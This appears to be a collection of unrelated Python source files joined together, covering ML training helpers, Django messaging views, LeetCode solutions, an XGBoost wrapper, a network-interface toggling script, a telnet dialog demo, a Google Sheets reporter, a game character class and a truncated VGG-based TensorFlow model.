return tsne_data, tsne_label, tsne_room_name, tsne_image_name
def plot_tsne(data, label, room_name, image_name):
cm = plt.get_cmap('gist_rainbow')
NUM_COLORS = 2
color = [cm(1. * i / NUM_COLORS) for i in range(NUM_COLORS)]
tsne = TSNE(n_components=2, random_state=0)
data = tsne.fit_transform(data)
# room = ['FloorPlan26', 'FloorPlan227', 'FloorPlan328', 'FloorPlan429', 'FloorPlan30']
kitchen_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30']
living_room = ['FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230']
bed_room = ['FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330']
bath_room = ['FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
# room = []
# room.append(random.sample(kitchen_room, 1))
# room.append(random.sample(living_room, 1))
# room.append(random.sample(bed_room, 1))
# room.append(random.sample(bath_room, 1))
total_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30', 'FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230', 'FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330', 'FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
room = random.sample(total_room, 2)
plt.figure(figsize=(12, 10))
for i in range(2):
if i == 0:
output_data = data[room_name==room[i]]
output_label = label[room_name==room[i]]
output_image_name = image_name[room_name==room[i]]
output_room_name = room_name[room_name==room[i]]
else:
output_data = np.concatenate((output_data, data[room_name==room[i]]), axis=0)
output_label = np.concatenate((output_label, label[room_name==room[i]]), axis=0)
output_image_name = np.concatenate((output_image_name, image_name[room_name==room[i]]), axis=0)
output_room_name = np.concatenate((output_room_name, room_name[room_name==room[i]]), axis=0)
plt.scatter(data[room_name==room[i], 0], data[room_name==room[i], 1], marker='.', label=room[i], c=color[i])
plt.legend()
plt.show()
return output_data, output_image_name, output_label, output_room_name
def save_model(model, optimizer, epoch, model_path):
print('==> Saving...')
if not os.path.exists(model_path):
os.makedirs(model_path)
model_out_path = "best_model.pth"
state = {
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'epoch': epoch,
}
model_out_path = os.path.join(model_path, model_out_path)
torch.save(state, model_out_path)
def set_model(opt, device):
if opt.mode == 'label':
model = resnet.resnet18(num_classes=4, opt=opt)
# model = resnet.resnet50(num_classes=4, opt=opt)
elif opt.mode == 'self':
model = resnet.resnet50(opt=opt)
if opt.pretrained == '':
# pass
if opt.mode == 'label':
# pass
pretrained_model = torchvision.models.resnet18(pretrained=True)
# pretrained_model = torchvision.models.resnet50(pretrained=True)
model.conv1.load_state_dict(pretrained_model.conv1.state_dict())
model.bn1.load_state_dict(pretrained_model.bn1.state_dict())
model.relu.load_state_dict(pretrained_model.relu.state_dict())
model.maxpool.load_state_dict(pretrained_model.maxpool.state_dict())
model.layer1.load_state_dict(pretrained_model.layer1.state_dict())
model.layer2.load_state_dict(pretrained_model.layer2.state_dict())
model.layer3.load_state_dict(pretrained_model.layer3.state_dict())
model.layer4.load_state_dict(pretrained_model.layer4.state_dict())
model.avgpool.load_state_dict(pretrained_model.avgpool.state_dict())
else:
pass
else:
checkpoint = torch.load(opt.pretrained)
model.load_state_dict(checkpoint['model'], strict=False)
if torch.cuda.is_available():
if torch.cuda.device_count() > 1:
print(torch.cuda.device_count(), 'Multi GPU running')
model = torch.nn.DataParallel(model)
model = model.to(device)
return model
class GaussianBlur(object):
"""Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709"""
def __init__(self, sigma=[.1, 2.]):
self.sigma = sigma
def __call__(self, x):
sigma = random.uniform(self.sigma[0], self.sigma[1])
x = x.filter(ImageFilter.GaussianBlur(radius=sigma))
return x
|
python
|
x = int(input())
if x % 2 == 0:
y = x + 1
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
else:
y = x
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
|
python
|
from datetime import datetime
from django.utils import timezone
from django.shortcuts import render, get_object_or_404
from django.db.models import Q
from django.contrib.auth.models import User, Group
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseRedirect
from django.views.decorators.http import condition
from foundation_public.models.organization import PublicOrganization
from tenant_profile.decorators import tenant_profile_required
from tenant_intake.decorators import tenant_intake_required
from tenant_reception.decorators import tenant_reception_required
from tenant_configuration.decorators import tenant_configuration_required
from foundation_tenant.decorators import tenant_required
from foundation_tenant.models.base.message import Message
from foundation_tenant.models.base.me import Me
from smegurus import constants
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def inbox_page(request):
# Fetch all the Messages and only get a single message per sender. Also ensure
# that deleted messages are not returned.
messages = Message.objects.filter(
recipient=request.tenant_me,
participants=request.tenant_me
).distinct('participants')
return render(request, 'tenant_message/message/master_view.html',{
'page': 'inbox',
'messages': messages,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def compose_page(request):
entrepreneurs = Me.objects.filter(owner__groups__id=constants.ENTREPRENEUR_GROUP_ID)
mentors = Me.objects.filter(owner__groups__id=constants.MENTOR_GROUP_ID)
advisors = Me.objects.filter(owner__groups__id=constants.ADVISOR_GROUP_ID)
managers = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_MANAGER_GROUP_ID)
admins = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_ADMIN_GROUP_ID)
return render(request, 'tenant_message/composer/generic_view.html',{
'page': 'composer',
'entrepreneurs': entrepreneurs,
'mentors': mentors,
'advisors': advisors,
'managers': managers,
'admins': admins,
'recipient_id': 0,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def specific_compose_page(request, id):
entrepreneurs = Me.objects.filter(owner__groups__id=constants.ENTREPRENEUR_GROUP_ID)
mentors = Me.objects.filter(owner__groups__id=constants.MENTOR_GROUP_ID)
advisors = Me.objects.filter(owner__groups__id=constants.ADVISOR_GROUP_ID)
managers = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_MANAGER_GROUP_ID)
admins = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_ADMIN_GROUP_ID)
recipient = get_object_or_404(Me,pk=id)
return render(request, 'tenant_message/composer/specific_view.html',{
'page': 'composer',
'entrepreneurs': entrepreneurs,
'mentors': mentors,
'advisors': advisors,
'managers': managers,
'admins': admins,
'recipient': recipient,
})
@login_required()
@tenant_required
def latest_conversation_details(request, sender_id):
return Message.objects.filter(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
participants=request.tenant_me
) | Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
participants=request.tenant_me
)
).latest("last_modified").last_modified
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def conversation_page(request, sender_id):
messages = Message.objects.filter(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
participants=request.tenant_me
) | Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
participants=request.tenant_me
)
).order_by("created")
# Recipients have the ability to update the 'date_read'.
for message in messages.all():
if message.recipient == request.tenant_me:
# Give the message the read-time.
message.date_read = timezone.now()
message.save()
return render(request, 'tenant_message/message/details_view.html',{
'page': 'inbox',
'messages': messages,
'sender_id': sender_id,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_conversation_page(request, sender_id):
messages = Message.objects.filter(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
participants=request.tenant_me
) | Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
participants=request.tenant_me
)
).order_by("created")
# Iterate through all the messages and removes the person from the conversation. (A.k.a.: archived)
for message in messages.all():
message.participants.remove(request.tenant_me)
message.save()
# Redirect his page.
return HttpResponseRedirect(reverse('tenant_message_inbox'))
@login_required()
@tenant_required
def latest_archived_message_master(request):
try:
return Message.objects.filter(
Q(
recipient=request.tenant_me
) &~ # and not
Q(
participants=request.tenant_me
)
).latest("last_modified").last_modified
except Message.DoesNotExist:
return datetime.now()
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
# @condition(last_modified_func=latest_archived_message_master)
def archive_list_page(request):
# Fetch all the Messages and only get a single message per sender. Also ensure
# that deleted messages are not returned.
messages = Message.objects.filter(
Q(
recipient=request.tenant_me
) &~ # and not
Q(
participants=request.tenant_me
)
).distinct('participants')
return render(request, 'tenant_message/archive/master_view.html',{
'page': 'archive',
'messages': messages,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_details_page(request, sender_id):
messages = Message.objects.filter(
Q(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
) &~ # and not
Q(
participants=request.tenant_me
)
) |
Q(
Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
) &~ # and not
Q(
participants=request.tenant_me
)
)
).order_by("created")
return render(request, 'tenant_message/archive/details_view.html',{
'page': 'archive',
'messages': messages,
'sender_id': sender_id,
})
|
python
|
# https://leetcode.com/problems/palindrome-number/
class Solution:
def isPalindrome(self, x: int) -> bool:
if x < 0:
return False
p, res = x, 0
while p:
res = res * 10 + p % 10
p = int(p/10)
return res == x
|
python
|
import numpy as np
import multiprocessing
import xgboost as xgb # requires xgboost package, installed e.g. via 'pip install xgboost'
class XGBoost:
def __init__(self, train_loader, val_loader, x_shape, dim_out, args):
self.args = args
self.dim_out = dim_out
if args.regression:
objective = 'reg:linear'
eval_metric = 'rmse'
if args.criterion in {'mae', 'l1'}:
eval_metric = 'mae'
elif args.criterion not in {None, 'auto', 'rmse'}:
raise Exception('Unknown eval_metric={}. For regression, use auto (rmse) | mae (l1).'.format(
args.criterion))
else:
if self.dim_out > 2:
objective = 'multi:softmax' # out 1 vector of classes
if args.criterion in {None, 'auto', 'error', 'merror'}:
eval_metric = 'merror'
elif args.criterion in {'logloss', 'nll'}:
eval_metric = 'mlogloss'
else:
raise Exception('eval_metric={} is not supported for multi-classes classification. '
'Use auto (merror) | logloss (nll)'.format(args.criterion))
else:
objective = 'binary:hinge' # 'binary:logistic' # logistic -> predict outputs probability, not class
if args.criterion in {None, 'auto', 'error', 'merror'}:
eval_metric = 'error'
elif args.criterion in {'logloss', 'nll'}: # auc somehow only works with 2 classes
eval_metric = 'logloss'
elif args.criterion == 'auc': # auc somehow only works with 2 classes
eval_metric = 'auc'
else:
raise Exception('eval_metric={} is not supported for 2-class classification. '
'Use auto (error) | logloss (nll) | auc'.format(args.criterion))
self.x_train, self.y_train = train_loader.numpy_data()
self.x_val, self.y_val = val_loader.numpy_data()
if len(self.x_train.shape) > 2:
self.x_train = self.x_train.reshape(self.x_train.shape[0], -1)
self.x_val = self.x_val.reshape(self.x_val.shape[0], -1)
self.dtrain = xgb.DMatrix(self.x_train, label=self.y_train)
self.dval = xgb.DMatrix(self.x_val, label=self.y_val)
if args.early_stopping is not None and args.early_stopping <= 0:
self.early_stopping = None
else:
self.early_stopping = args.early_stopping
num_cpu = multiprocessing.cpu_count()
if not hasattr(args, 'n_workers') or args.n_workers is None:
args.n_workers = 1
elif args.n_workers > num_cpu:
args.n_workers = num_cpu
if args.verbose >= 3:
print('args.n_workers is inefficiently large, changed it to num_cpu=' + str(num_cpu))
elif args.n_workers <= -300:
args.n_workers = max(1, num_cpu // 3)
elif args.n_workers <= -200:
args.n_workers = max(1, num_cpu // 2)
elif args.n_workers < 0:
args.n_workers = max(1, num_cpu + args.n_workers)
self.params = {'objective': objective,
'eval_metric': eval_metric,
'seed': args.seed,
'max_depth': args.max_depth,
'eta': args.eta,
'min_child_weight': args.min_child_weight,
'gamma': args.gamma,
'subsample': args.subsample,
'colsample_bytree': args.colsample_bytree,
'lambda': args.reg_lambda,
'alpha': args.reg_alpha,
'scale_pos_weight': args.scale_pos_weight,
'nthread': args.n_workers}
if objective == 'multi:softmax' or objective == 'multi:softprob':
self.params['num_class'] = dim_out
self.result = {'n_estimators': 0}
self.model = None
if args.verbose >= 3:
print('XGBOOST OPTIMIZER LOADED: ')
def eval(self, x, y):
pred = self.predict(x)
rmse = mae = error = float('inf')
if self.args.regression:
rmse = np.sqrt(np.sum((pred - y)**2) / y.shape[0]).item()
mae = (np.sum(np.abs(pred - y)) / y.shape[0]).item()
else:
if self.params['objective'] == 'binary:logistic': # pred is probability, not class
pred[pred >= 0.5] = 1
pred[pred < 0.5] = 0
pred = pred.astype(int)
correct = np.sum(pred == y).item()
error = 1.0 - float(correct) / y.shape[0]
loss = rmse if self.params['eval_metric'] == 'rmse' else mae
return loss, error, rmse, mae
def train(self):
eval_list = [(self.dtrain, 'train'), (self.dval, 'valdt')] # last in the list is used for early stopping
if self.args.verbose >= 5:
verbose_eval = True
elif self.args.verbose <= 3:
verbose_eval = False
else:
verbose_eval = self.args.n_estimators // 10 # output only 10 evaluation info
self.model = xgb.train(self.params, self.dtrain, self.args.n_estimators, eval_list,
verbose_eval=verbose_eval, early_stopping_rounds=self.early_stopping)
tr_loss, tr_error, tr_rmse, tr_mae = self.eval(self.x_train, self.y_train)
vl_loss, vl_error, vl_rmse, vl_mae = self.eval(self.x_val, self.y_val)
self.result = {'train_loss': tr_loss, 'train_error': tr_error, 'train_rmse': tr_rmse, 'train_mae': tr_mae,
'val_loss': vl_loss, 'val_error': vl_error, 'val_rmse': vl_rmse, 'val_mae': vl_mae,
'n_estimators': self.model.best_ntree_limit}
if self.args.verbose >= 3:
if self.args.regression and not self.args.dataset.endswith("_r"):
print('TRAIN RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(tr_loss, tr_rmse, tr_mae))
print('VALDT RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(vl_loss, vl_rmse, vl_mae))
else:
print('TRAIN RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
tr_loss, 100. * tr_error, 100. * (1 - tr_error)))
print('VALDT RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
vl_loss, 100. * vl_error, 100. * (1 - vl_error)))
def test(self, dataloader):
x_test, y_test = dataloader.numpy_data()
if len(x_test.shape) > 2:
x_test = x_test.reshape(x_test.shape[0], -1)
return self.eval(x_test, y_test)
def predict(self, x):
assert self.model, 'model is not yet trained. Call train() first!'
x = xgb.DMatrix(x)
pred = self.model.predict(x, ntree_limit=self.model.best_ntree_limit)
return pred
@property
def best_n_modules(self):
return self.result['n_estimators']
|
python
|
import os
import time
# 请求用户输入要循环开关闭的网卡名称
eth_name = input('请输入要循环启用关闭的网卡名称:')
# 记录循环次数
i = 1
while True:
# 关闭指定网卡
os.popen('ifconfig ' + eth_name + ' down')
print(eth_name + '网卡关闭了')
# 休眠5S
time.sleep(5)
# 开启指定网卡
os.popen('ifconfig ' + eth_name + ' up')
print(eth_name + '网卡开启了')
# 休眠5S
time.sleep(5)
print('第' + str(i) + '次循环结束')
i = i + 1
|
python
|
import wx
class Example(wx.Frame):
def __init__(self, parent, title):
super(Example, self).__init__(parent, title=title,
size=(400, 200))
self.Move((800, 250))
#self.Centre()
def main():
app = wx.App()
ex = Example(None, title='M2I & MQL - Moving Wind')
ex.Show()
app.MainLoop()
if __name__ == '__main__':
main()
|
python
|
"""
This file defines common tags to use in templates
"""
from django import template
from django.contrib import messages
from django.template.defaultfilters import safe
register = template.Library()
@register.filter(name="make_spaces")
def make_spaces(in_string: str) -> str:
"""
This filter takes a string and replaces all dashes and underscores with spaces
:param in_string: The string to change
:type in_string: str
:returns: A string with no dashes or underscores
:rtype: str
"""
return in_string.replace("_", " ").replace("-", " ")
link_types = {
'delete': 'link-danger',
'abandon': 'link-danger',
'cancel': 'link-danger',
}
@register.filter(name="link_class")
def get_link_class(action_name: str) -> str:
"""
This filter gets what link class to use based off the action that it performs
:param action_name: The name of the action
:type action_name: str
:returns: The link class that conveys what the action does
:rtype: str
"""
return link_types.get(action_name, "link-primary")
level_classes = {
messages.SUCCESS: "success",
messages.ERROR: "danger",
messages.DEBUG: "info",
messages.INFO: "info",
messages.WARNING: "warning",
}
@register.filter(name="alert_class")
def get_alert_class(message_level: str) -> str:
"""
This filter gets an alert class for the specified message type
:param message_level: The level of the message
:type message_level: int
:returns: The corresponding alert class to use
:rtype: str
"""
return f'alert-{level_classes.get(message_level, "info")}'
icon_classes = {
messages.SUCCESS: "check-circle",
messages.ERROR: "exclamation-circle",
messages.DEBUG: "info-circle",
messages.INFO: "info-circle",
messages.WARNING: "exclamation-triangle",
}
@register.filter(name="icon_class")
def get_icon_class(message_level: str) -> str:
"""
This filter gets an alert icon for the specified message type
:param message_level: The level of the message
:type message_level: int
:returns: The corresponding alert icon to use
:rtype: str
"""
return f'bi bi-{icon_classes.get(message_level, "info-circle")}'
@register.simple_tag(name="external_link")
def external_link(href: str, display_text: str, classes: str = "") -> str:
"""
This tag will render an <a> element that will open in a new tab and be marked as external
:param href: The href of the link
:type href: str
:param display_text: The test to display in the <a> element
:type display_text: str
:param classes: Classes to add to the <a> element
:type classes: str
:returns: An <a> element in html that when clicked will open in a new tab
:rtype: str
"""
return safe(f'<a href="{href}" class="{classes}" target="_blank" rel="noopener">{display_text}</a>')
|
python
|
import json
from google.protobuf import json_format
from services.doubler.doubler_pb2 import Number
def build_request_from_dict(d, request):
json_str = json.dumps(d)
return json_format.Parse(json_str, request)
def build_request_from_file(filename, request):
with open(filename) as f:
json_str = f.read()
return json_format.Parse(json_str, request)
def build_number_from_dict(d):
return build_request_from_dict(d, Number())
def build_number_from_file(filename):
return build_request_from_file(filename, Number())
|
python
|
from .convLSTM import StConvLSTM
from .GRU import StGRU
from .additive import StAdditive
from .LSTM import StLSTM
|
python
|
#!/usr/bin/env python
"""
Example of a telnet application that displays a dialog window.
"""
from __future__ import unicode_literals
from prompt_toolkit.contrib.telnet.server import TelnetServer
from prompt_toolkit.shortcuts.dialogs import yes_no_dialog
from prompt_toolkit.eventloop import From, get_event_loop
import logging
# Set up logging
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
def interact(connection):
result = yield From(yes_no_dialog(
title='Yes/no dialog demo', text='Press yes or no', async_=True))
connection.send('You said: {}\n'.format(result))
connection.send('Bye.\n')
def main():
server = TelnetServer(interact=interact, port=2323)
server.start()
get_event_loop().run_forever()
if __name__ == '__main__':
main()
|
python
|
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
def contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista):
# Quantidade Pedidos estão fechado
quant_terminado = len(lista)
celula= "Página1!"+str("D2")
service = build('sheets', 'v4', credentials=creds)
sheet = service.spreadsheets()
body = {'values': [[quant_terminado]]}
result = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID, range=celula,valueInputOption="USER_ENTERED", body=body).execute()
# Quais são os pedidos estão fechados
for id_cliente in range(len(lista)):
texto= lista[id_cliente]
celula= "Página1!"+str("A%i"%(id_cliente+2))
service = build('sheets', 'v4', credentials=creds)
sheet = service.spreadsheets()
body = {'values': [[texto]]}
result = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID, range=celula,valueInputOption="USER_ENTERED", body=body).execute()
def main(lista):
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
# The ID and range of a sample spreadsheet.
padrao_planilha= input("deseja usar a mesma planilha. y ou digite qualquer coisa\n").lower()
if padrao_planilha == "y":
SAMPLE_SPREADSHEET_ID = '1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563'
else:
SAMPLE_SPREADSHEET_ID = input("INSERIR A PARTE DO URL DO GOOGLE SHEETS, EX: 1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563 \n")
"""Shows basic usage of the Sheets API.
Prints values from a sample spreadsheet.
"""
lista= lista
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('sheets', 'v4', credentials=creds)
contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista)
|
python
|
'''
Created on Jan 6, 2016
@author: T0157129
'''
import logging
import logging.config
from Items.PotionObject import PotionObject
class MyCharacter:
'''
This class represents a basic character.
Attributes:
int HP : represents the Health Points of the character.
If HP==0 the character is dead
dict equipment : represents the equipment of the character.
weapon : the character's active weaponObject
armor : the character's active armorObject
dict bag : represents the bag of the character. Here will be stored every found item.
HP_potion : the number of HP potions that the character owns.
<item_name> : any found itemObject.
Functions:
boolean isAlive()
'''
def __init__(self, HP, name, level):
'''
Constructor
'''
self.HPinit= HP
self.HP = HP
self.name = name
self.level= level
self.gold= 0
self.equipment= {}
self.equipment["weapon"]=None
self.equipment["armor"]=None
self.bag={}
'''
boolean isAlive()
Return true if HP > 0
'''
def isAlive(self):
return self.HP>0
########################################
# EQUIPMENT management
########################################
'''
void equipWeapon(weaponObject)
Equip the character with the weaponObject.
If a weapon is already equipped, the old one is added to the bag.
'''
def equipWeapon(self, weaponObject):
if weaponObject is not None:
actualWeapon= self.equipment["weapon"]
if actualWeapon is not None:
self.addToBag(actualWeapon)
self.equipment["weapon"]= weaponObject
# self.logger.info("Weapon equipped: %s" % weaponObject.name)
'''
void equipArmor(armorObject)
Equip the character with the armorObject.
If an armor is already equipped, the old one is added to the bag.
'''
def equipArmor(self, armorObject):
if armorObject is not None:
actualArmor = self.getArmor()
if actualArmor is not None:
self.addToBag(actualArmor)
self.equipment["armor"]= armorObject
# self.logger.info("Armor equipped: %s" % armorObject.name)
'''
weaponObject getWeapon()
Return the equipped weapon.
Can be None
'''
def getWeapon(self):
weapon = self.equipment["weapon"]
self.equipment["weapon"]= None
return weapon
'''
armorObject getArmor()
Return the equipped armor.
Can be None
'''
def getArmor(self):
armor = self.equipment["armor"]
self.equipment["armor"]= None
return armor
########################################
# BAG management
########################################
'''
void listInventory()
Print the content of the character's bag
'''
def listInventory(self):
print( '-- INVENTORY OF %s CONTAINS:' % self.name)
for itemName in self.bag.keys():
print (" |%s" % self.bag[itemName])
'''
void addToBag(itemObject)
Add itemObject to the bag.
The key for this object is the itemObject.name
'''
def addToBag(self, itemObject):
self.bag[itemObject.name()]= itemObject
print("Item put in bag: %s" % itemObject.name())
'''
itemObject getFromBag(itemName)
Get the object named "itemName" from the bag.
If there is no itemObject named like this in the bag, return None.
'''
def getFromBag(self, itemName):
return self.bag[itemName]
'''
itemObject takeFromBag(itemName)
Get the object named "itemName" from the bag.
The object is no longer in the bag.
If there is no itemObject named like this in the bag, return None.
'''
def takeFromBag(self, itemName):
return self.bag.pop(itemName)
def removeFromBag(self, itemName):
self.bag.pop(itemName)
'''
void useFromBag(itemName)
If an item with this name is found, call its use function.
'''
def useFromBag(self, itemName):
item= self.bag.get(itemName)
if item is not None:
if item.get('usable') is None:
print('Not usable')
return
else:
#If it's not a potion we remove the object from the bag
if not isinstance(item, PotionObject):
item= self.takeFromBag(itemName)
if item is None:
print("No such object in the bag.")
else:
item.use(self)
else:
print("none obj")
########################################
# FIGHT management
########################################
'''
void defend(damagePoints)
The character loose HP depending on his armor and damagePoints.
'''
def defend(self, damagePoints):
armor= self.equipment["armor"]
if armor != None:
m_damagePoints = damagePoints - armor.defensePoints()
if m_damagePoints < 0:
m_damagePoints=0
else:
m_damagePoints = damagePoints
self.HP = self.HP - m_damagePoints
print("%s has lost %d HP..." % (self.name,m_damagePoints))
'''
void attack(characterObject)
The character attacks characterObject.
If the character has no weapon, do nothing.
'''
def attack(self, characterObject):
weapon = self.equipment["weapon"]
if weapon != None:
print("%s attacks." % self.name)
characterObject.defend(weapon.attackPoints())
else:
print("%s can't attack, no weapon..." % self.name)
########################################
# Other functions
########################################
'''
unitsUsed fillHP(units)
Refill HP bar with units points.
Return the number of units recovered.
(Can be: 0 if HP == HPinit
or units
or the difference between HP and HPinit if HP+units > HPinit)
'''
def fillHP(self, units):
unitsUsed= 0
if self.HP < self.HPinit:
#Restore HP
if self.HP + units >= self.HPinit:
unitsUsed= self.HPinit - self.HP
else:
unitsUsed= units
self.HP= self.HP + unitsUsed
print("%s recovered %d HP." % (self.name, unitsUsed))
else:
print("%s HP already full." % self.name)
return unitsUsed
|
python
|
# Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
class Solution(object):
def merge(self, intervals):
"""
:type intervals: List[Interval]
:rtype: List[Interval]
"""
ans = []
for intv in sorted(intervals, key=lambda x: x.start):
if ans and ans[-1].end >= intv.start:
ans[-1].end = max(ans[-1].end, intv.end)
else:
ans.append(intv)
return ans
|
python
|
from __future__ import division
import os,time,cv2
import scipy.io as sio
import tensorflow as tf
import tensorflow.contrib.slim as slim
import numpy as np
from numpy import *
import scipy.linalg
from copy import copy, deepcopy
def lrelu(x):
return tf.maximum(x*0.2,x)
def identity_initializer():
def _initializer(shape, dtype=tf.float32, partition_info=None):
array = np.zeros(shape, dtype=float)
cx, cy = shape[0]//2, shape[1]//2
for i in range(min(shape[2],shape[3])):
array[cx, cy, i, i] = 1
return tf.constant(array, dtype=dtype)
return _initializer
def nm(x):
w0=tf.Variable(1.0,name='w0')
w1=tf.Variable(0.0,name='w1')
return w0*x+w1*slim.batch_norm(x)
MEAN_VALUES = np.array([123.6800, 116.7790, 103.9390]).reshape((1,1,1,3))
def build_net(ntype,nin,nwb=None,name=None):
if ntype=='conv':
return tf.nn.relu(tf.nn.conv2d(nin,nwb[0],strides=[1,1,1,1],padding='SAME',name=name)+nwb[1])
elif ntype=='pool':
return tf.nn.avg_pool(nin,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')
def get_weight_bias(vgg_layers,i):
weights=vgg_layers[i][0][0][2][0][0]
weights=tf.constant(weights)
bias=vgg_layers[i][0][0][2][0][1]
bias=tf.constant(np.reshape(bias,(bias.size)))
return weights,bias
def build_vgg19(input,reuse=False):
if reuse:
tf.get_variable_scope().reuse_variables()
net={}
vgg_rawnet=scipy.io.loadmat('Models/imagenet-vgg-verydeep-19.mat')
vgg_layers=vgg_rawnet['layers'][0]
net['input']=input-MEAN_VALUES
net['conv1_1']=build_net('conv',net['input'],get_weight_bias(vgg_layers,0),name='vgg_conv1_1')
net['conv1_2']=build_net('conv',net['conv1_1'],get_weight_bias(vgg_layers,2),name='vgg_conv1_2')
net['pool1']=build_net('pool',net['conv1_2'])
net['conv2_1']=build_net('conv',net['pool1'],get_weight_bias(vgg_layers,5),name='vgg_conv2_1')
net['conv2_2']=build_net('conv',net['conv2_1'],get_weight_bias(vgg_layers,7),name='vgg_conv2_2')
net['pool2']=build_net('pool',net['conv2_2'])
net['conv3_1']=build_net('conv',net['pool2'],get_weight_bias(vgg_layers,10),name='vgg_conv3_1')
net['conv3_2']=build_net('conv',net['conv3_1'],get_weight_bias(vgg_layers,12),name='vgg_conv3_2')
net['conv3_3']=build_net('conv',net['conv3_2'],get_weight_bias(vgg_layers,14),name='vgg_conv3_3')
net['conv3_4']=build_net('conv',net['conv3_3'],get_weight_bias(vgg_layers,16),name='vgg_conv3_4')
net['pool3']=build_net('pool',net['conv3_4'])
net['conv4_1']=build_net('conv',net['pool3'],get_weight_bias(vgg_layers,19),name='vgg_conv4_1')
net['conv4_2']=build_net('conv',net['conv4_1'],get_weight_bias(vgg_layers,21),name='vgg_conv4_2')
net['conv4_3']=build_net('conv',net['conv4_2'],get_weight_bias(vgg_layers,23),name='vgg_conv4_3')
net['conv4_4']=build_net('conv',net['conv4_3'],get_weight_bias(vgg_layers,25),name='vgg_conv4_4')
net['pool4']=build_net('pool',net['conv4_4'])
net['conv5_1']=build_net('conv',net['pool4'],get_weight_bias(vgg_layers,28),name='vgg_conv5_1')
net['conv5_2']=build_net('conv',net['conv5_1'],get_weight_bias(vgg_layers,30),name='vgg_conv5_2')
#net['conv5_3']=build_net('conv',net['conv5_2'],get_weight_bias(vgg_layers,32),name='vgg_conv5_3')
#net['conv5_4']=build_net('conv',net['conv5_3'],get_weight_bias(vgg_layers,34),name='vgg_conv5_4')
#net['pool5']=build_net('pool',net['conv5_4'])
return net
def build(input,sz):
vgg19_features=build_vgg19(input[:,:,:,0:3])
for layer_id in range(1,6):
vgg19_f = vgg19_features['conv%d_2'%layer_id]
input = tf.concat([input, tf.image.resize_bilinear(vgg19_f,sz)], axis=3)
input = input/255.0
net=slim.conv2d(input,64,[1,1],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv0')
net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv1')
